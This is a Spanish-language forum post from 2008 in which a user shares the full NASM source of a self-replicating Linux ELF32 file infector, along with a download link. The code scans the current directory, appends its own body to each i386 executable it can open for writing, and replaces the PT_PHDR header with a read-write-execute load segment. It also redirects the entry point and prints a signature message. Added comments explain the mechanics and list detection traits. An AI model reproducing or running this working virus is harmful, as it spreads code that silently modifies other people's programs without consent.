Purple-Cat

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Virus para Linux
« en: 14 Febrero 2008, 21:13 »

Hola, bueno, aquí les dejo mi primer virus para Linux; cuando tenga tiempo comentaré más el código. Infecta los ELF ejecutables de la carpeta actual: para eso reemplaza un program header de tipo 6 por uno de tipo 1 que carga el virus, y modifica el entry point. Acá lo tienen:

http://www.galeon.com/purplecat/PurpleCat.zip

Código:

; NASM source, 32-bit x86, Linux (int 0x80 system-call interface).
; Analysis note: this listing is a proof-of-concept ELF32 file infector; the
; constants below are the i386 syscall numbers and flag values it relies on.
BITS 32
GLOBAL main
SECTION .text

system EQU 0x80                 ; int 0x80 = Linux i386 system-call gate
standart_output EQU 1           ; fd 1 (stdout)
read_and_write EQU 2            ; open(2) flags value O_RDWR
SEEK_SET EQU 0
SEEK_CUR EQU 1
SEEK_END EQU 2
new_line EQU 10                 ; '\n'

; i386 syscall numbers (loaded into eax before int 0x80)
sys_exit EQU 1
sys_read EQU 3
sys_write EQU 4
sys_open EQU 5
sys_close EQU 6
sys_lseek EQU 19
sys_readdir EQU 89              ; legacy readdir(2): one directory entry per call
sys_getcwd EQU 183

;-----------------------------------------------------------------------
; main: entry stub. Together with the Virus body that follows it, the bytes
; from main up to End_virus are what Unused_ph appends to every infected
; file. It saves all registers and flags, runs Virus, restores them and
; jumps to Host. The stub is 7 bytes up to and including the call, so the
; return address Virus pops on entry equals main + 7 (Unused_ph subtracts 7
; to recover main). The rel32 of the final jmp is at byte 10 of the stub;
; that is the dword Unused_ph patches in the appended copy so that an
; infected file continues at its original entry point.
;-----------------------------------------------------------------------
main:
pushad
pushfd
call Virus                      ; pushes main + 7
popfd
popad
jmp Host                        ; in an infected file this jmp is redirected to the host's original e_entry

;-----------------------------------------------------------------------
; Virus: position-independent infector body (NASM, i386 Linux, int 0x80).
; Frame: 512 bytes below ebp. Slots used by the code below:
;   [ebp-4]    return address popped on entry (delta offset = main + 7)
;   [ebp-8]    fd of the current working directory
;   [ebp-12]   fd of the candidate file
;   [ebp-16]   candidate's original e_entry
;   [ebp-20]   first e_phnum, then the file offset of the program header being scanned
;   [ebp-24]   candidate's original file size (lseek SEEK_END)
;   [ebp-28]   scratch dword written back to the file (patched rel32 / new e_entry)
;   [ebp-56]   32-byte Elf32_Phdr built for the replacement entry
;   [ebp-64]   52-byte Elf32_Ehdr copy read from the candidate
;   [ebp-256]  256-byte getcwd() buffer
;   [ebp-274]  legacy dirent returned by readdir; d_name begins 10 bytes in ([ebp-264])
; Leaves through Payload (prints its message) with leave/ret.
; Detection notes for an infected file: its PT_PHDR entry is replaced by a
; PT_LOAD with p_offset 0, p_vaddr 0x20000000 and p_flags 7 (RWX) covering
; the whole grown file; e_entry points at 0x20000000 + original size; the
; file grows by End_virus - main bytes; and the appended code carries the
; payload message in 4-byte fragments (mov immediates).
;-----------------------------------------------------------------------
Virus:
Start:
pop eax                         ; eax = return address pushed by "call Virus" (main + 7)
push eax                        ; put it back so ret still works

push ebp
mov ebp, esp
sub esp, 512                    ; 512-byte frame, see slot map above

mov dword [ebp - 4], eax ;We have in [ebp - 4] the virtual address (delta offset) of the virus.

; getcwd(buf = [ebp-256], size = 256)
mov ecx, 256
lea ebx, [ebp - 256]
mov eax, sys_getcwd
int system

; open(cwd, flags = 0 (O_RDONLY), mode = 0) to enumerate its entries
xor edx, edx
xor ecx, ecx
lea ebx, [ebp - 256]
mov eax, sys_open
int system
test eax, eax
js Exit                         ; negative eax = -errno: nothing to scan, go straight to the payload
mov dword [ebp - 8], eax ;We have in [ebp - 8] the handle of current path.
jmp Find_file

Exit:
jmp Payload

Close_file:                     ; close([ebp-12]), then fall into Find_file for the next entry
mov ebx, [ebp - 12]
mov eax, sys_close
int system

Find_file:
; readdir(dirfd, dirent = [ebp-274]); returns 0 at end of directory
lea ecx, [ebp - 274]
mov ebx, [ebp - 8]
mov eax, sys_readdir
int system
test eax, eax
jz Exit

; open(d_name = [ebp-264], O_RDWR); entries that cannot be opened read-write are skipped
mov ecx, read_and_write
lea ebx, [ebp - 264]
mov eax, sys_open
int system
test eax, eax
js Find_file
mov [ebp - 12], eax ;We have in [ebp - 12] the handle of the file we are going to check.

; read(fd, [ebp-64], 52): 52 = sizeof(Elf32_Ehdr); only a negative return is rejected
mov edx, 52
lea ecx, [ebp - 64]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
test eax, eax
js Close_file

; Target filter, all compares against the header copy at [ebp-64]
mov eax, [ebp - 64]
cmp eax, 0x464C457F             ; e_ident[0..3] = 0x7F 'E' 'L' 'F'
jnz Close_file

mov eax, [ebp - 60]
cmp eax, 0x00010101             ; EI_CLASS=1 (32-bit), EI_DATA=1 (little-endian), EI_VERSION=1, pad 0
jnz Close_file

mov ax, [ebp - 48]
cmp ax, 0x0002                  ; e_type (offset 16) = ET_EXEC
jnz Close_file

mov eax, [ebp - 46]
cmp eax, 0x00010003             ; e_machine (offset 18) = 3 (EM_386), low half of e_version = 1
jnz Close_file

Infect_file:
mov cx, [ebp - 20]              ; cx = e_phnum (header offset 44)
test cx, cx
jz Close_file

mov eax, [ebp - 40]             ; e_entry (header offset 24)
mov [ebp - 16], eax ;We have in [ebp - 16] the entry point of the program.

and ecx, 0x0000FFFF             ; ecx = e_phnum; only cx was loaded, so clear the upper half
mov ebx, [ebp - 36]             ; e_phoff (header offset 28)
mov [ebp - 20], ebx ;We have in [ebp - 20] the offset of the first program header.

Check_ph:
; Walk the program header table (ecx = headers remaining) and stop at the
; first entry whose p_type == 6 (PT_PHDR).
push ecx

mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov edx, 32                     ; 32 = sizeof(Elf32_Phdr)
lea ecx, [ebp - 52]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
cmp dword [ebp - 52], 6         ; p_type == PT_PHDR?
jz Unused_ph                    ; the pushed counter stays on the stack; leave discards it

add dword [ebp - 20], 32        ; next program header
pop ecx
loop Check_ph

jmp Close_file                  ; no PT_PHDR found: file is left untouched

Unused_ph:
; lseek(fd, 0, SEEK_END) -> original file size
mov edx, SEEK_END
mov ecx, 0
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov [ebp - 24], eax ;We have in [ebp - 24] the size of the file.

; write(fd, main, End_virus - main): append a copy of main..End_virus at
; end of file. [ebp-4] - 7 is the runtime address of main, since the
; return address saved on entry is main + 7.
mov edx, End_virus - main
mov ecx, [ebp - 4]
sub ecx, 7
mov ebx, [ebp - 12]
mov eax, sys_write
int system

; Patch the rel32 of "jmp Host" inside the appended copy (byte 10 of the
; stub). With the copy mapped at 0x20000000 + size, the instruction after
; the jmp sits at 0x20000000 + size + 14, so
; rel32 = original e_entry - 0x2000000E - size.
mov edx, SEEK_SET
mov ecx, [ebp - 24]
add ecx, 10
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 16]
sub eax, 0x2000000E
sub eax, [ebp - 24]
mov [ebp - 28], eax

mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

; Overwrite the PT_PHDR entry (its file offset is still in [ebp-20]) with a
; PT_LOAD that maps the whole grown file, read/write/execute, at 0x20000000.
mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 24]
add eax, End_virus - main       ; eax = new file size

mov dword [ebp - 56], 0x00000001 ; p_type   = PT_LOAD
mov dword [ebp - 52], 0x00000000 ; p_offset = 0 (maps from the start of the file)
mov dword [ebp - 48], 0x20000000 ; p_vaddr
mov dword [ebp - 44], 0x20000000 ; p_paddr
mov dword [ebp - 40], eax        ; p_filesz = new file size
mov dword [ebp - 36], eax        ; p_memsz  = new file size
mov dword [ebp - 32], 0x00000007 ; p_flags  = PF_R | PF_W | PF_X
mov dword [ebp - 28], 0x00001000 ; p_align

mov edx, 32
lea ecx, [ebp - 56]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

; e_entry (header offset 24) := 0x20000000 + original size, the appended copy of main
mov edx, SEEK_SET
mov ecx, 24
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 24]
add eax, 0x20000000
mov dword [ebp - 28], eax

mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

jmp Close_file

Payload:
; Builds a 75-byte message on the stack out of 4-byte immediates (the
; last dword holds "es" plus the newline) and writes it to stdout.
; The frame slots used above are reused here; none of them is read again.
mov dword [ebp - 76], 'Hi, '
mov dword [ebp - 72], 'this'
mov dword [ebp - 68], ' is '
mov dword [ebp - 64], 'a pr'
mov dword [ebp - 60], 'oof '
mov dword [ebp - 56], 'of c'
mov dword [ebp - 52], 'once'
mov dword [ebp - 48], 'pt v'
mov dword [ebp - 44], 'irus'
mov dword [ebp - 40], ', by'
mov dword [ebp - 36], ' Pur'
mov dword [ebp - 32], 'ple '
mov dword [ebp - 28], 'Cat:'
mov dword [ebp - 24], ' pur'
mov dword [ebp - 20], 'ple-'
mov dword [ebp - 16], 'cat@'
mov dword [ebp - 12], 'hotm'
mov dword [ebp - 8], 'ail.'
mov dword [ebp - 4], 'es' + new_line*256*256

; write(1, [ebp-76], 75)
mov edx, 75
lea ecx, [ebp - 76]
mov ebx, standart_output
mov eax, sys_write
int system

leave                           ; drops the frame (and any counter left by Check_ph)
ret                             ; returns to main + 7

End_virus:                      ; end of the bytes that get appended to infected files

;-----------------------------------------------------------------------
; Host: the carrier program's own code and data. Not part of the copied
; main..End_virus range; prints a banner and exits.
;-----------------------------------------------------------------------
Host:
mov edx, 21                     ; length of "The host is running!\n"
mov ecx, Host_message           ; absolute address, valid only inside this original binary
mov ebx, standart_output
mov eax, sys_write
int system

mov eax, sys_exit               ; exit(ebx); ebx is still 1 from the write above
int system

SECTION .data
Host_message db "The host is running!", new_line
